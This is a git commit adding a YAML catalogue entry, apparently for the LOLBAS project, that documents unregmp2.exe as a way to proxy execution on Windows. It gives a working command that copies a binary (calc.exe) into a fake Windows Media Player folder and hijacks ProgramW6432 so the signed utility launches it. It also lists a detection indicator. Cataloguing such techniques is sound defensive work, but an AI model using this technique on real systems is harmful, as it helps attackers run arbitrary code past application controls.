Create Unregmp2.yml

Added a new lolbin, unregmp2.exe, used for proxying execution.
This commit is contained in:
whickey-r7 2021-12-06 12:13:24 -05:00 committed by GitHub
parent 17899acbb0
commit 18bceb7639
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -0,0 +1,24 @@
---
Name: Unregmp2.exe
Description: Microsoft Windows Media Player Setup Utility
Author: 'Wade Hickey'
Created: 2021-12-06
Commands:
- Command: rmdir %temp%\lolbin /s /q 2>nul & mkdir "%temp%\lolbin\Windows Media Player" & copy C:\Windows\System32\calc.exe "%temp%\lolbin\Windows Media Player\wmpnscfg.exe" >nul && cmd /V /C "set "ProgramW6432=%temp%\lolbin" && unregmp2.exe /HideWMP"
Description: Allows an attacker to copy a target binary to a controlled directory and modify the 'ProgramW6432' environment variable to point to that controlled directory, then execute 'unregmp2.exe' with argument '/HideWMP' which will spawn a process at the hijacked path '%ProgramW6432%\wmpnscfg.exe'.
Usecase: Proxy execution of binary
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10
Full_Path:
- Path: C:\Windows\System32\unregmp2.exe
- Path: C:\Windows\SysWOW64\unregmp2.exe
Detection:
- IOC: Low-prevalence binaries, with filename 'wmpnscfg.exe', spawned as child-processes of `unregmp2.exe /HideWMP`
Resources:
- Link: https://twitter.com/notwhickey/status/1466588365336293385
Acknowledgement:
- Person: Wade Hickey
Handle: '@notwhickey'
---